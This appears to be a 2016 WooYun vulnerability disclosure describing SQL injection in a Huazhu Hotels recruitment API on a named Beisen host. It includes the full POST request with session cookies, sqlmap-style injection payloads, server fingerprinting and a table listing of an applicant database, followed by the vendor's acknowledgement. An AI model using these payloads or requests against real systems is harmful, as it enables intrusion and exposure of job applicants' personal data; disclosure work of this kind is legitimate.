华住酒店某处接口SQL注入漏洞 | wooyun-2016-0184337| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0184337

漏洞标题：华住酒店某处接口SQL注入漏洞

漏洞作者： Looke

提交时间：2016-03-13 21:22

修复时间：2016-04-28 16:09

公开时间：2016-04-28 16:09

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-13：细节已通知厂商并且等待厂商处理中
2016-03-14：厂商已经确认，细节仅向厂商公开
2016-03-24：细节向核心白帽子及相关领域专家公开
2016-04-03：细节向普通白帽子公开
2016-04-13：细节向实习白帽子公开
2016-04-28：细节向公众公开

简要描述：

详细说明：

漏洞位置：

漏洞地址：

POST /api/InternalInfo/InternalRecommendJobAdListForPy HTTP/1.1
Accept-Language: zh-CN
X-Requested-With: XMLHttpRequest
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://recruitofficer.tms.beisen.com/PyInternal/RecommendList?From=Custom
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; MI NOTE LTE Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
Origin: http://recruitofficer.tms.beisen.com
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Host: recruitofficer.tms.beisen.com
Cookie: beisenBusiType=JRv3/pK7NziIls4YxGA20w==; beisenCache6=C4SrRW0T8K1c+nNU0WUJlNVchab9/ID4p/t53IGXkzqVYvI+LRIurtLiFgdyfNJCMAaNkLRPys6hSetzj30FJMcPz8HiQSy3cz/pQ/4/rSMdh6NQI8XUJDC1wGGGm14XEBNNImV1PdiGp4tZNxR4krTgDoxwiwJ1uPcxPz2/zUFeWtFlig4nH1ZfNqtF7tC02G2myFiAktQfDFCfp0WQGplKcea6B3pKTIscGXvZNuHdCpjb6EZ8D5btrAOI4yuLEDI1u2PGJgseabEgimWZF/AROVhscEWCXGnBRI1dNVLcwFp598/kAd9TzJuhnKSi6hbvklSFc/MRsgLKdJMEa81u8rIsMijhJcpi5hmdzAs=; beisenVersion=sV0zQHmV7HA8ZV5SYGkVgA==; gr_session_id_e30f00323ed092421ec53b5aa52e4465=7820e748-50a0-4591-88e2-188433c35cd7; gr_user_id=3547aaf3-91c3-4793-a649-be6a8582fe89
Content-Length: 53
pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7*

name参数存在注入

---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 7680=7680 AND '%'='
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 3354=CONVERT(INT,(SELECT CH
AR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3354=3354) THEN CHAR(49) ELSE CHA
R(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113))) AND '%'='
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 4713=(SELECT COUNT(*) FROM
sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys
6,sysusers AS sys7) AND '%'='
---
[20:30:16] [INFO] testing Microsoft SQL Server
[20:30:16] [INFO] confirming Microsoft SQL Server
[20:30:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008

漏洞证明：

数据库：

数据信息很大的说，看下面，至于都有哪些信息，你们比我更懂,仅作测试，未dump数据库，日志可查，求个高rank可好？

Database: BeisenRecruitment001
+-------------------------------------------------------------+---------+
| Table                                                       | Entries |
+-------------------------------------------------------------+---------+
| dbo.Rel_ObjectDataOfApplicant                               | 21910244 |
| dbo.StandardResumeDetailValue                               | 18802224 |
| dbo.RelationHistory                                         | 11254767 |
| dbo.ApplyDocument                                           | 7516347 |
| dbo.ApplicantHistory                                        | 6111962 |
| dbo.ApplicantHistoryDigest                                  | 5173063 |
| dbo.PhaseTransferHistory                                    | 4925655 |
| dbo.REL_PersonJobStoreDB                                    | 4376542 |
| dbo.ResumeExperience                                        | 4144101 |
| dbo.ApplicantImportCenterInfo                               | 2715594 |
| dbo.ResumeEducation                                         | 2707816 |
| dbo.Rel_ObjectDataOfApply                                   | 2616834 |
| dbo.SearchCV                                                | 2605691 |
| dbo.SearchCVExtend                                          | 2601771 |
| dbo.ApplicantProfileLite                                    | 2590488 |
| dbo.StandradResumeValue                                     | 2469684 |
| dbo.REL_PersonJobHistory                                    | 2425882 |
| dbo.PersonApplyStat                                         | 1998890 |
| dbo.MailMessage                                             | 1339401 |
| dbo.GenericExtendCounter                                    | 1256675 |
| dbo.PendingPerson                                           | 1179443 |
| dbo.ResumeProject                                           | 1056161 |
| dbo.PersonStoreDbHistory                                    | 938211  |
| dbo.ApplicantImportCenter                                   | 285102  |
| dbo.SerialNumber                                            | 266092  |
| dbo.SynchronizeApplicant_SearchCV_GetPersonID_ParametersLog | 259574  |
| dbo.SerialNumberHistory                                     | 243251  |
| dbo.MessageSentHistory                                      | 240622  |
| dbo.REL_BeisenUserID                                        | 233569  |
| dbo.InterviewHistory                                        | 146300  |
| dbo.Relation_Interview_Interviewee                          | 131212  |
| dbo.Remark                                                  | 116225  |
| dbo.JobRelationOperationHistory                             | 107369  |
| dbo.Rel_PersonAndResumeFilter                               | 89735   |
| dbo.TitaTaskManage                                          | 81698   |
| dbo.AppMessage                                              | 78557   |
| dbo.InterviewInfoHistroy                                    | 76967   |
| dbo.InterviewInfo                                           | 73927   |
| dbo.ProxyLog                                                | 73015   |
| dbo.Relation_Interview_RemindJob                            | 72799   |
| dbo.ReplyRecord                                             | 62606   |
| dbo.DownLoadedResume                                        | 61974   |
| dbo.ProcessPhaseStatusConfig                                | 60397   |
| dbo.Counter_2                                               | 53073   |
| dbo.Relation_Interview_Interviewer                          | 51759   |
| dbo.ReplySetHistory                                         | 48092   |
| dbo.Rel_PhaseAndStatus                                      | 45542   |
| dbo.InterviewEvaluateResult                                 | 43635   |
| dbo.UploadedAttachment                                      | 40956   |
| dbo.ReplyMessageInfo                                        | 35024   |
| dbo.InterviewerReplySendRecord                              | 33324   |
| dbo.JobAdChannel_Class                                      | 28797   |
| dbo.JobAD                                                   | 27143   |
| dbo.JobADLoc                                                | 25640   |
| dbo.Rel_ProcessAndPhase                                     | 24893   |
| dbo.InterviewFeedBack                                       | 24355   |
| dbo.JobAd_External                                          | 23578   |
| dbo.JobBrowseLog                                            | 22272   |
| dbo.Job                                                     | 19671   |
| dbo.ProcessPhase                                            | 19285   |
| dbo.ProcessStatus                                           | 19110   |
| dbo.JobADAdditionalObject                                   | 17633   |
| dbo.ResumeTempFolder                                        | 17386   |
| dbo.ResumeFilter                                            | 16533   |
| dbo.WechatUserAndPerson                                     | 15892   |
| dbo.ReportLog                                               | 15809   |
| dbo.Rel_ResumeTempFolderAndUser                             | 15744   |
| dbo.EmaiJobRule                                             | 15392   |
| dbo.JobLoc                                                  | 12968   |
| dbo.ProcessReason                                           | 11750   |
| dbo.JobAdChannel_Apply                                      | 10986   |
| dbo.Officer                                                 | 10885   |
| dbo.Rel_StatusAndReason                                     | 10446   |
| dbo.ResumeDownload                                          | 9883    |
| dbo.REL_ObjectId_ShareGroupId                               | 9232    |
| dbo.OfferHistory                                            | 9049    |
| dbo.InterviewerReply                                        | 8989    |
| dbo.BatchRankingScore                                       | 7436    |
| dbo.RecieveSummary                                          | 7283    |
| dbo.Rel_ApplicantAndLabel                                   | 7135    |
| dbo.REL_JobAndInterviewEvaluation                           | 6754    |
| dbo.SendMailLog                                             | 6420    |
| dbo.InterviewEvaluationDetailItem                           | 6050    |
| dbo.ExportHistory                                           | 5984    |
| dbo.ApplicantViewCondition                                  | 5980    |
| dbo.ConstItem                                               | 5913    |
| dbo.TitaPorjectManage                                       | 5753    |
| dbo.Permission                                              | 5176    |
| dbo.EffectiveOffer                                          | 4958    |
| dbo.EffectiveOfferApply                                     | 4898    |
| dbo.RecruitProcess                                          | 4599    |
| dbo.HrJobBrowseLog                                          | 4484    |
| dbo.OfferAssesment                                          | 4049    |
| dbo.OfferCreaterMailInfo                                    | 3849    |
| dbo.Offer                                                   | 3779    |
| dbo.Interview                                               | 3595    |
| dbo.AutoInvitTest                                           | 3348    |
| dbo.ApplicantView                                           | 3009    |
| dbo.Rel_InternalRecommend                                   | 2994    |
| dbo.OfferApply                                              | 2849    |
| dbo.Relation_InterviewMessage_Interviewee                   | 2627    |
| dbo.StoreDB                                                 | 2440    |
| dbo.Finder                                                  | 2141    |
| dbo.SearchFieldOption                                       | 1956    |
| dbo.StaticizeLog                                            | 1899    |
| dbo.Attention                                               | 1852    |
| dbo.BizLookLog                                              | 1711    |
| dbo.ChannelRelation                                         | 1657    |
| dbo.MicroProcessMessageLog                                  | 1335    |
| dbo.InterviewLocation                                       | 1316    |
| dbo.RewardRulesSublist                                      | 1098    |
| dbo.StatisticsThisMonth                                     | 1035    |
| dbo.JobADPostUserName                                       | 919     |
| dbo.ConstItemId                                             | 825     |
| dbo.ApplicantLock                                           | 739     |
| dbo.RecruitPackage                                          | 716     |
| dbo.ChannelAuthorize                                        | 691     |
| dbo.ChannelSource                                           | 677     |
| dbo.ExamRoomPlan                                            | 666     |
| dbo.InterviewInfoType                                       | 632     |
| dbo.BadMessage                                              | 604     |
| dbo.InterviewSession                                        | 573     |
| dbo.MicroProcessActivity                                    | 566     |
| dbo.BlackListHistory                                        | 545     |
| dbo.RewardRules                                             | 457     |
| dbo.RecuritProject                                          | 440     |
| dbo.BlackList                                               | 419     |
| dbo.MicroProcess                                            | 360     |
| dbo.ExportFieldTemplate                                     | 357     |
| dbo.WebotSyncRecord                                         | 336     |
| dbo.ChannelDeliveryMapping                                  | 310     |
| dbo.InterviewEvaluationPartItem                             | 309     |
| dbo.GlobalSetting                                           | 296     |
| dbo.ResumeKeywordsLibrary                                   | 294     |
| dbo.HunterAccount                                           | 249     |
| dbo.Label                                                   | 242     |
| dbo.MailReceiveStrategy                                     | 238     |
| dbo.ReceiveEmailList                                        | 238     |
| dbo.IndexMap                                                | 192     |
| dbo.JobTitleLibrary                                         | 185     |
| dbo.Duty                                                    | 182     |
| dbo.ReSendEmailOrSmsHistory                                 | 177     |
| dbo.StandardResumeDetailField                               | 157     |
| dbo.Station                                                 | 141     |
| dbo.ConstType                                               | 136     |
| dbo.CadidateId                                              | 131     |
| dbo.InterviewEvaluationBasicInfo                            | 126     |
| dbo.JobTemplate                                             | 125     |
| dbo.SelectAllPageErrorInfo                                  | 121     |
| dbo.InterviewEvaluate                                       | 101     |
| dbo.InterviewSite                                           | 97      |
| dbo.MarketActivity                                          | 96      |
| dbo.WeChatOfficer_MyRecommend_CountResult                   | 73      |
| dbo.FromList                                                | 56      |
| dbo.Requirement                                             | 56      |
| dbo.TalentMining                                            | 52      |
| dbo.WeChatOfficer_PyInternal_CountResult                    | 49      |
| dbo.Relation_InterviewMessage_Officer                       | 47      |
| dbo.InterviewEvaluationDictDetial                           | 40      |
| dbo.Assesment                                               | 39      |
| dbo.InterviewSite_Officers                                  | 36      |
| dbo.ExamRoom                                                | 28      |
| dbo.RestTime                                                | 28      |
| dbo.Widget_Option                                           | 28      |
| dbo.Medium                                                  | 27      |
| dbo.RankAndFilter                                           | 25      |
| dbo.Invitation                                              | 23      |
| dbo.ApplicantLockSet                                        | 18      |
| dbo.WeChatOfficer_RedEnvelopes                              | 16      |
| dbo.RankingScoreHistory                                     | 15      |
| dbo.StandardResumeDetailSection                             | 14      |
| dbo.ActionTiggerCondition                                   | 13      |
| dbo.ActionForSendNotification                               | 11      |
| dbo.RecuritProjectCondition                                 | 11      |
| dbo.AutoTask                                                | 10      |
| dbo.Functions                                               | 10      |
| dbo.ChannelKind                                             | 9       |
| dbo.StandardResumeField                                     | 9       |
| dbo.MediumGroup                                             | 8       |
| dbo.Widget                                                  | 7       |
| dbo.InterviewEvaluationDictType                             | 4       |
| dbo.TaskItem                                                | 3       |
| dbo.AccessmentResultForUpdateApply                          | 2       |
| dbo.DefaultEmailReceiveStrategy                             | 2       |
| dbo.InterviewEamilEvaluation                                | 1       |
+-------------------------------------------------------------+---------+
Database: msdb
+-------------------------------------------------------------+---------+
| Table                                                       | Entries |
+-------------------------------------------------------------+---------+
| dbo.backupfile                                              | 975572  |
| dbo.backupset                                               | 487786  |
| dbo.backupmediafamily                                       | 487783  |
| dbo.backupmediaset                                          | 487783  |
| dbo.restorefile                                             | 68      |
| dbo.restorefilegroup                                        | 34      |
| dbo.restorehistory                                          | 34      |
| dbo.syspolicy_configuration                                 | 4       |
+-------------------------------------------------------------+---------+

修复方案：

过滤

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2016-03-14 16:09

厂商回复：

您好！感谢对华住酒店集团的关注，此问题己移交相关团队跟进处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0184337

漏洞标题：华住酒店某处接口SQL注入漏洞

相关厂商：汉庭酒店

漏洞作者： Looke

提交时间：2016-03-13 21:22

修复时间：2016-04-28 16:09

公开时间：2016-04-28 16:09

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0184337

漏洞标题：华住酒店某处接口SQL注入漏洞

相关厂商：汉庭酒店

漏洞作者： Looke

提交时间：2016-03-13 21:22

修复时间：2016-04-28 16:09

公开时间：2016-04-28 16:09

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0184337"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：